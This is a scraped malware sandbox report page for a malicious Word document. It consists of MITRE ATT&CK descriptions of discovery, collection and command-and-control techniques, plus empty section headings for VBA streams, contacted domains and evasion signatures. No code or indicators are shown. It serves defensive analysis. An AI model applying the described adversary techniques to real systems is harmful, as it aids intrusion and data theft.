Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report pack 2254794.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "pack 2254794.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Oi5oelv0_s4, Stream Size: 17886

General

VBA Code Keywords

VBA Code

VBA File Name: Qafkrimwsho, Stream Size: 697

General

VBA Code Keywords

VBA Code

VBA File Name: Wm_t404p8v_, Stream Size: 1106

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre